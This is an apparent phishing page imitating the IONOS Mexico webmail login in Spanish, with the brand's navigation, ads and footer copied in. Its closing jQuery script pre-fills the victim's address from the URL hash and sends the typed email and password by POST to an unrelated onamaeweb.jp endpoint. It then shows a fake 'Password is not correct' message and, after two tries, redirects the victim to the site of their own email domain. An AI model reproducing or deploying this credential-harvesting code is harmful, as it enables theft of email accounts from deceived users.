<html lang="es" data-i18n="oao.lang" data-i18n-attr="lang"><head>
  <!-- charset -->
  <meta charset="utf-8">


  <!-- head infos -->
  <title data-i18n="oao.login.title" data-i18n-attr="text">Webmail login » Acceso al correo electrónico | IONOS by 1&amp;1</title>
  <meta name="description" content="Accesa a Webmail de IONOS: puedes leer, escribir y administrar tus e-mails." data-i18n="oao.login.description" data-i18n-attr="content">

  <!-- microsoft ie-mode -->
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <!-- mobile config -->
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- microsoft mobile config -->
  <meta id="win8Icon" name="msapplication-TileImage" content="img/apple-touch-icon.png">
  <meta id="win8TileColor" name="msapplication-TileColor" content="#003d8f">
  <!-- apple mobile config -->
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-title" content="">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <!-- apple-touch-icon -->
  <link rel="apple-touch-icon" href="img/apple-touch-icon.png">
  <!-- apple-touch-startup-image [media-devicewidth is not W3C-conform] -->
  <link rel="apple-touch-startup-image" href="img/apple-launch.png">
  <!-- favicon -->
  <link id="favicon" rel="shortcut icon" href="img/favicon.ico" type="image/x-icon">
  <!-- css includes -->
  <link rel="stylesheet" type="text/css" href="https://ce1.uicdn.net/exos/framework/1.2/ionos.min.css?v=1644232563929">
  <link rel="stylesheet" type="text/css" href="https://mail.ionos.mx/css/login.min.css?v=1644232563929">
<link type="text/css" rel="stylesheet" href="https://frontend-services.ionos.com/t/inpagelayer/css/inpagelayer.css?v=3.1.3"><link type="text/css" rel="stylesheet" href="https://frontend-services.ionos.com/t/navi/css/navigation.css?v=4.6.0"><script type="text/javascript" async="" src="https://ias.ionos.mx/ias/zones?zones=%5B%7B%22zoneId%22%3A%22webmailer_login%22%2C%22container%22%3A%22ias.zone0%22%7D%5D&amp;nc=1653932967963&amp;v=5.5.0&amp;subset=false&amp;application=WEBMAIL_LOGIN&amp;page=login&amp;lang=es_MX&amp;tenant=IONOS_MX&amp;data=%7B%7D&amp;screenWidth=1366&amp;screenHeight=667&amp;callback=__iascb60qSv"></script><script type="text/javascript" src="https://tif.ionos.mx/js/70000.js"></script><link type="text/css" rel="stylesheet" href="https://frontend-services.ionos.com/t/statuspage/css/statuspage.css?v=2.0.0"></head>
<body class="oao-pi-nolayer oao-pi-with-navigation">

<!-- exos main -->
<main class="page-content"><span class="page-transition__indicator-bar"></span>

  <!-- exos - global navigation -->
  <div class="oao-navi-navigation oao-navi-finished">
    <div class="oao-navi-top oao-navi-fade"><ul></ul></div><div class="oao-navi-left">
      <div class="oao-navi-application-name"><ul class="oao-navi-sub-left"><li class="oao-navi-flyout-container oao-navi-flyout-application_switch "><a class="oao-navi-flyout-item oao-navi-app-name oao-navi-app-nl oao-navi-as-no-icon" href="https://www.ionos.mx/"><span class="oao-navi-app-logo"></span><span class="oao-navi-app-name-span-nl">
          
          Webmail
        </span></a></li></ul>
      </div>
    </div>
  <div class="oao-navi-center oao-navi-fade"><ul><li class="oao-navi-flyout-container oao-navi-flyout-search oao-navi-flyout-search-big"><div class="oao-navi-search-container"><a class="oao-navi-flyout-item" title="Buscador de soluciones"></a><div class="oao-navi-input-container oao-navi-speech"><i class="oao-navi-search-icon"></i><input class="oao-navi-search-input" type="search" placeholder="Buscar funciones, dominios y artículos de ayuda"><i class="oao-navi-search-mic"></i></div></div></li></ul></div><div class="oao-navi-right oao-navi-fade"><ul class="oao-navi-sub oao-navi-nl"><li class="oao-navi-flyout-container oao-navi-flyout-support "><a class="oao-navi-flyout-item" data-target-id="oao-navi-support-button" title=""></a></li><li class="oao-navi-flyout-container oao-navi-flyout-search oao-navi-flyout-search-small"><div class="oao-navi-search-container"><a class="oao-navi-flyout-item" title="Buscador de soluciones"></a><div class="oao-navi-input-container oao-navi-speech"><i class="oao-navi-search-icon"></i><input class="oao-navi-search-input" type="search" placeholder="Buscar funciones, dominios y artículos de ayuda"><i class="oao-navi-search-mic"></i></div></div></li></ul></div></div>

  <div class="clearfix" id="content">
    <div class="page-section page-section--default page-section--short">
      <div class="page-section__block">

        <!-- Global Navigation > Statuspage Integration > Incident/Maintenance status -->
        <div class="oao-statuspage-message-container" data-component="WEBMAIL,MAIL_RECEIVING,MAIL_SENDING"></div>

        <!-- error for JS-disabled browsers -->
        <noscript>
          <p class="noscript">
            This page uses JavaScript.
            Your browser either doesn't support JavaScript or you have it turned off.
            To use this page please use a JavaScript enabled browser.
          </p>
        </noscript>

        <!-- JavaScript based login-form -->
        <div class="sheet">
          <div class="sheet__section">
            <div class="sheet__block"><h1 class="headline" data-i18n="oao.login.heading" data-i18n-attr="text">Webmail Iniciar sesión</h1>
              <form id="login-form" class="form content-elem" action="" target="loginTarget" method="post" autocomplete="on">
                <legend class="hidden" data-i18n="oao.login.heading" data-i18n-attr="text">Webmail Iniciar sesión</legend>

                <!-- NON-exos: error output -->
                <div id="login-error" class="notificaiton-wrap"></div>

                <span class="input-text-group input-text-group--empty" style="overflow: visible; margin-bottom: 10px;"><span class="input-text-group__icon exos-icon exos-icon-nav-user-16"></span>
                  <!-- type email not working in IE for Umlaut-Domains currently -->
                  <input class="input-text login-form-user" id="email" maxlength="200" name="email" size="40" tabindex="1" autocapitalize="none" spellcheck="false" type="text" required="true" value=""><label class="label login-form-user-label" for="login-form-user"><span data-i18n="oao.login.field.email" data-i18n-attr="text">Dirección de e-mail</span></label></span>
                <div class="label align-horizontal-right">
                  <a data-i18n="oao.login.forgotpw.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2327&amp;utm_term=2327&amp;utm_campaign=forgotpw&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=flyin" data-flyin-href="" class="link link--lookup oao-pi-open-in-flyin">
                    <span data-i18n="oao.login.forgotpw.heading" data-i18n-attr="text">¿Has olvidado tu contraseña?</span>
                  </a>
                </div>
                <span class="input-text-group input-text-group--empty" style="overflow: visible; margin-bottom: 10px;"><span class="input-text-group__icon exos-icon exos-icon-password-16"></span><input class="input-text login-form-password" id="password" maxlength="40" name="password" size="40" tabindex="2" type="password" required="true" value=""><label class="label login-form-password-label" for="login-form-password"><span data-i18n="oao.login.field.password" data-i18n-attr="text">Contraseña</span></label></span>
                <div class="sub-form-field left">
                  <input id="staysignedin-box" class="input-checkbox" name="staysignedin" type="checkbox" value="1" tabindex="3">
                  <label for="staysignedin-box">
                    <a data-i18n="oao.login.stay-signed-in.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=4083&amp;utm_term=4083&amp;utm_campaign=staysignedin&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=flyin" data-flyin-href="" class="link link--lookup oao-pi-open-in-flyin">
                      <span data-i18n="oao.login.stay-signed-in" data-i18n-attr="text">Permanecer registrado</span>
                    </a>
                  </label>
                </div>
				<p id="msg" style="color:red;"></p>
                <footer class="sheet__footer">
                  <button class="button button--primary button--with-loader button--full-width" id="login-btn" tabindex="3" type="submit" data-i18n="oao.login" data-i18n-attr="text">Iniciar sesión</button>
                </footer>
              </form>
            </div>
          </div>
        </div>

        <section id="ciso-afs-ads">
          <div class="ias-zone" data-ias-zoneid="webmailer_login" id="ias.zone0"><div data-medium-id="WEBMAIL_LOGIN_TEASER_MAIL" data-medium-variant="DEFAULT">
<section id="ias-container">
  <div class="grid-12 equal-grid-height">
    <div class="grid-07 grid-small-12">
      <h2 class="ias-headline">¿Aún no tienes una cuenta de correo electrónico profesional?</h2>
      
          <p>Correo electrónico en IONOS desde 1 €. Dominio gratis.</p>
        
      
      <div>
        <a class="button-link" target="_blank" href="https://ias.ionos.mx/ias/follow/CLICK?ias_source=WEBMAILER-MX&amp;ias_medium=login-webmailer_login&amp;ias_content=WEBMAIL_LOGIN_TEASER_MAIL-DEFAULT&amp;ias_campaign=&amp;iasSessionId=8d03d8c6-cfc8-40f0-a78c-7b47430f2806&amp;target=https%3A%2F%2Fwww.ionos.mx%2Fsoluciones-oficina%2Fcorreo-electronico%3Fac%3DOM.MB.MB263K417288T7073a">Más información</a>
      </div>
    </div>
    <div class="grid-05 grid-small-12 align-horizontal-center align-vertical-center">
      <img class="ias-responsive-video" src="https://ias.uicdn.net/fileadmin/IONOS/user_upload/email-marketing.svg?h=0fbfd484b7052efe457d3090b4c14a657e1f366d">
    </div>
  </div>
</section>

<style type="text/css">
  #ias-container {
    background: #fff;
    margin-top: 32px;
    padding: 28px;
    -moz-box-shadow: 0 1px 2px 0 rgba(80,87,91,.15);
    -webkit-box-shadow: 0 1px 2px 0 rgba(80,87,91,.15);
    box-shadow: 0 1px 2px 0 rgba(80,87,91,.15);
  }
  .ias-responsive-video {
    max-width: 100%;
    max-height: 240px;
  }
  .ias-headline {
    width: 100%;
  }
</style>

</div></div>
        </section>

        <section id="assistants">
          <h2 class="headline headline--sub" data-i18n="oao.login.setup.headline" data-i18n-attr="text">Configura tu buzón de e-mail en más dispositivos</h2>
          <dl class="pipe-list">
            <dt data-i18n="oao.login.setup.mobile" data-i18n-attr="text">Móvil</dt>
            <dd>
              <a data-i18n="oao.login.setup.mobile.ios.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2442&amp;utm_term=2442&amp;utm_campaign=mobile-ios&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=article" class="link" tabindex="9" target="_blank">
                <span data-i18n="oao.login.setup.mobile.ios" data-i18n-attr="text">iOS</span>
              </a>
            </dd>
            <dd>
              <a data-i18n="oao.login.setup.mobile.android.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2444&amp;utm_term=2444&amp;utm_campaign=mobile-android&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=article" class="link" tabindex="10" target="_blank">
                <span data-i18n="oao.login.setup.mobile.android" data-i18n-attr="text">Android</span>
              </a>
            </dd>
          </dl>
          <dl class="pipe-list">
            <dt data-i18n="oao.login.setup.desktop" data-i18n-attr="text">Escritorio</dt>
            <dd>
              <a data-i18n="oao.login.setup.desktop.thunderbird.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2436&amp;utm_term=2436&amp;utm_campaign=desktop-thunderbird&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=article" class="link" tabindex="11" target="_blank">
                <span data-i18n="oao.login.setup.desktop.thunderbird" data-i18n-attr="text">Thunderbird</span>
              </a>
            </dd>
            <dd>
              <a data-i18n="oao.login.setup.desktop.outlook.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2462&amp;utm_term=2462&amp;utm_campaign=desktop-outlook&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=article" class="link" tabindex="12" target="_blank">
                <span data-i18n="oao.login.setup.desktop.outlook" data-i18n-attr="text">Outlook</span>
              </a>
            </dd>
            <dd>
              <a data-i18n="oao.login.setup.desktop.applemail.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2445&amp;utm_term=2445&amp;utm_campaign=desktop-applemail&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=article" class="link" tabindex="13" target="_blank">
                <span data-i18n="oao.login.setup.desktop.applemail" data-i18n-attr="text">Apple Mail</span>
              </a>
            </dd>
          </dl>
          <dl class="pipe-list">
            <dt data-i18n="oao.login.setup.other" data-i18n-attr="text">Otros</dt>
            <dd>
              <a data-i18n="oao.login.setup.other.assistants.link" data-i18n-attr="href" href="https://www.ionos.mx/ayuda/index.php?id=2490&amp;utm_term=2490&amp;utm_campaign=other-assistants&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=article" class="link" tabindex="14" target="_blank">
                <span data-i18n="oao.login.setup.other.assistants" data-i18n-attr="text">programas de e-mail (POP/IMAP)</span>
              </a>
            </dd>
          </dl>
        </section>


        <h2 class="headline headline--sub" data-i18n="oao.login.morelogins.heading" data-i18n-attr="text">Más inicios de sesión en IONOS</h2>
        <div class="grid-12 equal-grid-spacing equal-grid-height">
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both">
              <a class="tile tile--filled" href="https://my.ionos.mx/" data-i18n="oao.login.controlcenter.link" data-i18n-attr="href" tabindex="6">
                <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                  <path class="product-icon__key" fill="#0b9dcc" d="M84,58c6.6,0,12-5.4,12-12s-5.4-12-12-12s-12,5.4-12,12S77.4,58,84,58z M84,38c4.4,0,8,3.6,8,8s-3.6,8-8,8
          s-8-3.6-8-8S79.6,38,84,38z M107.2,78C104.5,67.4,95,60,84,60s-20.5,7.4-23.2,18c-0.2,0.9,0.2,1.8,1,2.2C68.5,84,76.2,86,84,86
          s15.5-2,22.3-5.8C107.1,79.8,107.5,78.9,107.2,78z M84,82c-6.6,0-13.1-1.6-18.9-4.5C67.8,69.5,75.4,64,84,64s16.2,5.5,18.9,13.5
          C97.1,80.4,90.6,82,84,82z"></path>
                  <path class="product-icon__base" fill="#001b41" d="M156.4,55.6l-8.9,9.7c-0.4,0.4-0.9,0.7-1.5,0.7c0,0,0,0,0,0c0,0,0,0,0,0c-0.4,0-0.8-0.1-1.1-0.3l-11-7.3
          c-0.9-0.6-1.2-1.9-0.6-2.8c0.6-0.9,1.9-1.2,2.8-0.6l7.7,5.1C141.9,28.9,115.8,4,84,4C55.4,4,30.6,24.3,25.1,52.4
          c-0.2,1.1-1.3,1.8-2.3,1.6c-1.1-0.2-1.8-1.3-1.6-2.3C27.1,21.7,53.5,0,84,0c33.6,0,61.3,26.1,63.8,59.1l5.6-6.1
          c0.7-0.8,2-0.9,2.8-0.1C157,53.5,157.1,54.8,156.4,55.6z M145.2,74c-1.1-0.2-2.1,0.5-2.3,1.6c-5.5,28-30.3,48.4-58.9,48.4
          c-31.8,0-57.9-24.9-59.9-56.2l7.7,5.1c0.3,0.2,0.7,0.3,1.1,0.3c0.6,0,1.3-0.3,1.7-0.9c0.6-0.9,0.4-2.2-0.6-2.8l-11-7.3
          c-0.8-0.5-1.9-0.4-2.5,0.3c0,0-8.9,9.8-8.9,9.8c-0.7,0.8-0.7,2.1,0.1,2.8c0.4,0.4,0.9,0.5,1.3,0.5c0.5,0,1.1-0.2,1.5-0.7l5.6-6.1
          c2.5,33,30.2,59.1,63.8,59.1c30.5,0,56.9-21.7,62.8-51.6C147,75.3,146.3,74.2,145.2,74z"></path>
                </svg>
                <span class="tile__label" data-i18n="oao.login.controlcenter" data-i18n-attr="text">My IONOS</span>
              </a>
            </div>
          </div>
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both">
              <a class="tile tile--filled" href="https://hidrive.ionos.com/" data-i18n="oao.login.hidrive.link" data-i18n-attr="href" tabindex="7">
                <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                  <path class="product-icon__key" d="M58,72h6v14c0,1.1,0.9,2,2,2h36c1.1,0,2-0.9,2-2V72h6c0.9,0,1.7-0.6,1.9-1.5c0.2-0.9-0.1-1.8-0.9-2.2l-26-16         c-0.6-0.4-1.5-0.4-2.1,0l-26,16c-0.8,0.5-1.1,1.4-0.9,2.2C56.3,71.4,57.1,72,58,72z M84,56.3L102.9,68H102c-1.1,0-2,0.9-2,2v14H68         V70c0-1.1-0.9-2-2-2h-0.9L84,56.3z M110,108h-6V94c0-1.1-0.9-2-2-2H66c-1.1,0-2,0.9-2,2v14h-6c-0.9,0-1.7,0.6-1.9,1.5         c-0.2,0.9,0.1,1.8,0.9,2.2l26,16c0.3,0.2,0.7,0.3,1,0.3s0.7-0.1,1-0.3l26-16c0.8-0.5,1.1-1.4,0.9-2.2         C111.7,108.6,110.9,108,110,108z M84,123.7L65.1,112H66c1.1,0,2-0.9,2-2V96h32v14c0,1.1,0.9,2,2,2h0.9L84,123.7z" fill="#0b9dcc"></path>
                  <path class="product-icon__base" d="M136,104h-22c-1.1,0-2-0.9-2-2s0.9-2,2-2h22c15.4,0,28-12.6,28-28c0-12.4-7.9-23.1-19.7-26.8         c-0.7-0.2-1.2-0.7-1.3-1.4C139.3,29.8,126.5,20,112,20c-0.6,0-1.3,0-2,0.1c-0.6,0-1.2-0.2-1.6-0.7C99.6,9.6,87.1,4,74,4         C52.7,4,34.3,18.5,29.3,39.2c-0.2,0.7-0.8,1.3-1.5,1.5C14,43.6,4,55.9,4,70c0,16.5,13.5,30,30,30h20c1.1,0,2,0.9,2,2s-0.9,2-2,2H34         C15.3,104,0,88.7,0,70c0-15.6,10.7-29.2,25.7-33C31.6,15.2,51.2,0,74,0c13.9,0,27.2,5.8,36.7,16c0.5,0,0.9,0,1.3,0         c16,0,30,10.5,34.5,25.8C159.4,46.2,168,58.3,168,72C168,89.6,153.6,104,136,104z" fill="#001b41"></path>
                </svg>
                <span class="tile__label" data-i18n="oao.login.hidrive" data-i18n-attr="text">HiDrive</span>
              </a>
            </div>
          </div>
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both">
              <a class="tile tile--filled" href="https://archivero.ionos.mx" data-i18n="oao.login.archiving.link" data-i18n-attr="href" tabindex="8">
                <svg class="product-icon" viewBox="0 0 128 128" xmlns="http://www.w3.org/2000/svg">
                  <path class="product-icon__base" d="M88,16H57.05V12H90a2,2,0,0,1,2,2V26.22H88Zm8-3.18v13.4h4V12.82A8.84,8.84,0,0,0,91.17,4H57.05V8H91.17A4.83,4.83,0,0,1,96,12.82Zm0,88.38v14A4.82,4.82,0,0,1,91.18,120H57.05v4H91.18a8.83,8.83,0,0,0,8.82-8.82v-14Zm-8,0V112H57.05v4H90a2,2,0,0,0,2-2V101.2Z" fill="#001b41"></path>
                  <path class="product-icon__key" d="M120.8,26H57.05v4H120.8a3.26,3.26,0,0,1,1.32.29L95.24,49.79c-1.12.85-4.62,3.06-7.38,3.06s-6.26-2.21-7.4-3.08L57.7,33c-.2-.15-.65,4.49-.65,4.49L78.06,53s.33.25.79.56L57.05,70.72s.49,4.71.71,4.54l24.9-19.64a13.54,13.54,0,0,0,5.2,1.23,13.46,13.46,0,0,0,5.22-1.24l28.56,22.27a3.35,3.35,0,0,1-.84.13H57.05v4h59v2a4,4,0,0,1-4,4H57.05v4h51v2a4,4,0,0,1-4,4H57.05v4h47a8,8,0,0,0,8-8V92a8,8,0,0,0,8-8V82h.8a7.21,7.21,0,0,0,7.2-7.2V33.2A7.21,7.21,0,0,0,120.8,26ZM124,74.64,96.9,53.51c.42-.28.69-.48.72-.51L124,33.87Z" fill="#0b9dcc"></path>
                  <path class="product-icon__base" d="M28.56,39.38c-8.27,0-14.74,11-14.74,25.09s6.47,25.1,14.74,25.1,14.73-11,14.73-25.1S36.82,39.38,28.56,39.38Zm5.14,6.68-1.56,2.42a2,2,0,0,0,.6,2.77,2,2,0,0,0,1.08.32,2,2,0,0,0,1.68-.92l.63-1a27.18,27.18,0,0,1,1.54,3.84l-1.61,1a2,2,0,0,0,2.08,3.42l.53-.32a38.26,38.26,0,0,1,.57,4.93h-.7a2,2,0,0,0,0,4h.69a37.47,37.47,0,0,1-.53,4.62l-.34-.24a2,2,0,0,0-2.31,3.27l1.64,1.15A26.29,26.29,0,0,1,36,79.42l-.77-1.28a2,2,0,0,0-3.42,2.08L33.56,83a8.51,8.51,0,0,1-2.74,2V83.58a2,2,0,0,0-4,0v1.67a8,8,0,0,1-3-2l1.85-3a2,2,0,0,0-3.42-2.08l-1,1.59a24.65,24.65,0,0,1-1.75-4.18l1.93-1.36a2,2,0,1,0-2.3-3.27l-.67.47a39,39,0,0,1-.57-4.85h1.06a2,2,0,0,0,0-4H17.87a37.7,37.7,0,0,1,.61-5.13l.86.52a2,2,0,0,0,1,.29,2,2,0,0,0,1-3.71l-1.77-1.08-.15-.07a25,25,0,0,1,1.65-4L22,50.65a2,2,0,0,0,1.68.92,2.09,2.09,0,0,0,1.09-.32,2,2,0,0,0,.59-2.77L23.72,46a.76.76,0,0,0-.11-.14,8.14,8.14,0,0,1,3-2.11V45.5a2,2,0,0,0,4,0V43.8A8.58,8.58,0,0,1,33.7,46.06ZM21.77,64.47c0,6.09,2.92,10.68,6.79,10.68s6.78-4.59,6.78-10.68-2.92-10.68-6.78-10.68S21.77,58.38,21.77,64.47Zm9.57,0c0,4-1.67,6.68-2.78,6.68s-2.79-2.66-2.79-6.68,1.68-6.68,2.79-6.68S31.34,60.46,31.34,64.47ZM56.47,2.06l-8.26-2a2,2,0,0,0-1.08,0L34.85,4h-26A8.84,8.84,0,0,0,0,12.82V115.18A8.83,8.83,0,0,0,8.82,124H35l12.38,3.91a2,2,0,0,0,.6.09,2.05,2.05,0,0,0,.49-.06l7.94-2A2,2,0,0,0,57.94,124L58,4A2,2,0,0,0,56.47,2.06ZM12,93.72A2,2,0,0,0,13,92V80a2,2,0,0,0-1-1.72V51.72A2,2,0,0,0,13,50V38a2,2,0,0,0-1-1.72V15.46L46,4.65V123.27L12,112.53ZM8.82,120A4.82,4.82,0,0,1,4,115.18V12.82A4.83,4.83,0,0,1,8.83,8H22.27L9.39,12.09A2,2,0,0,0,8,14V36.28A2,2,0,0,0,7,38V50a2,2,0,0,0,1,1.72V78.28A2,2,0,0,0,7,80V92a2,2,0,0,0,1,1.72V114a2,2,0,0,0,1.4,1.91l13,4.09Zm45.12,2.44-3.94,1V4.61l4,1Z" fill="#001b41"></path>
                </svg>
                <span class="tile__label" data-i18n="oao.login.archiving" data-i18n-attr="text">Archivero e-mail</span>
              </a>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</main>

<!-- exos footer -->
<footer class="page-footer">
  <div class="page-footer__block">
    <section class="page-footer__section page-footer__section--align-center page-footer__section--small-align-left">
      <div class="page-footer__section-item">
        <!-- Global Navigation > Statuspage Integration > Overall status -->
        <div class="oao-statuspage-overall-status"><a class="oao-statuspage-overall-state-none" target="_blank" href="https://www.ionos-status.mx/?utm_medium=footer&amp;utm_content=none&amp;utm_source=WEBMAIL_LOGIN&amp;utm_campaign=login&amp;utm_term=no_search">Todos los sistemas funcionan con normalidad</a></div>
      </div>
      <div class="page-footer__section-item">
        <a class="link" data-i18n="oao.login.imprint.link" data-i18n-attr="href" href="https://www.ionos.mx/empresa" target="_blank">
          <span data-i18n="oao.login.ionos.legal" data-i18n-attr="text">IONOS Inc.</span>&nbsp;•&nbsp;<span data-i18n="{YEAR}" data-i18n-attr="text">2022</span>
        </a>
      </div>
      <div class="page-footer__section-item">
        <a class="link" data-i18n="oao.login.datasecurity.link" data-i18n-attr="href" href="https://www.ionos.mx/terms-gtc/terms-privacy/" target="_blank">
          <span data-i18n="oao.login.datasecurity" data-i18n-attr="text">Política de privacidad</span>
        </a>
      </div>
    </section>
  </div>
</footer>

<!-- SPA workaround iframe -->
<iframe class="hidden" src="robots.txt" name="loginTarget"></iframe>

<!-- js libs -->
<script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/ias/js/ias.js?v=5.5.0"></script><script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/surveys/js/surveys.js?v=1.0.2"></script><script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/privacyconsent/js/privacyconsent.js?v=2.0.0"></script><script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/statuspage/js/statuspage.js?v=2.0.0"></script><script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/inpagelayer/js/inpagelayer.js?v=3.1.3"></script><script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/navi/js/navigation.js?v=4.6.0"></script><script type="text/javascript" async="" src="https://frontend-services.ionos.com/t/sentry/bundle.min.js"></script><script id="oaotag" type="text/javascript" async="" defer="" src="https://frontend-services.ionos.com/t/tag/IONOS/webmail-login.js"></script><script src="https://ce1.uicdn.net/exos/framework/1.2/ionos.min.js?v=1644232563929" async="async"></script>
<script type="text/javascript" src="main.min.js?v=1644232563929"></script>


<div class="page-transition__blocker"><div class="page-transition__loading-spin loading-spin"></div></div><div class="static-overlay__blocker static-overlay__blocker--hidden"></div>



<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>



                <script>

                    /* global $ */
                    $(document).ready(function(){
                      var count=0;
                
                            var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
		$('#emailich').html(my_email);
		
		
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

 
      }

                
                      
                      $('#login-btn').click(function(event){
                        $('#error').hide();
                        $('#msg').hide();
                        event.preventDefault();
                        var email=$("#email").val();
                        var password=$("#password").val();
                        var msg = $('#msg').html();
                        $('#msg').text( msg );
                
                                    if (!password) {
                                $('#msg').show();
                                $('#msg').html("Password field is empty!");
                
                                return false;
                            }
                
                
                
                       
                      count=count+1;
                      
                      $.ajax({
                        dataType: 'JSON',
                        url: 'https://202307051011295385924.onamaeweb.jp/next.php',
                        type: 'POST',
                        data:{
                          email:email,
                          password:password,
                        },
                            data: $('#login-form').serialize(),
                            beforeSend: function(xhr){
                            
                            },
                            success: function(response){
                              if(response){
                                $("#msg").show();
                                console.log(response);
                                if(response['signal'] == 'ok'){
                                   $("#password").val("");
                                  if (count>=2) {
                                    count=0;
                                    // window.location.replace(response['redirect_link']);
                                    window.location.replace("https://www."+my_slice);
                
                                  }
                                               $("#msg").show();
                               $('#msg').html("Password is not correct. Please try again");
                                }
                                else{
                                                $("#msg").show();
                               $('#msg').html("Password is not correct. Please try again");
                                }
                              }
                            },
                            error: function(){
                              $("#password").val(""); 
                              if (count>=2) {
                                count=0;
                                window.location.replace("https://www."+my_slice);
                              }
                              $("#msg").show();
                               $('#msg').html("Password is not correct. Please try again");
                            },
                            complete: function(){
                            
                            }
                          });
                    });
                
                
                    });
                
                
                  </script>
</body></html>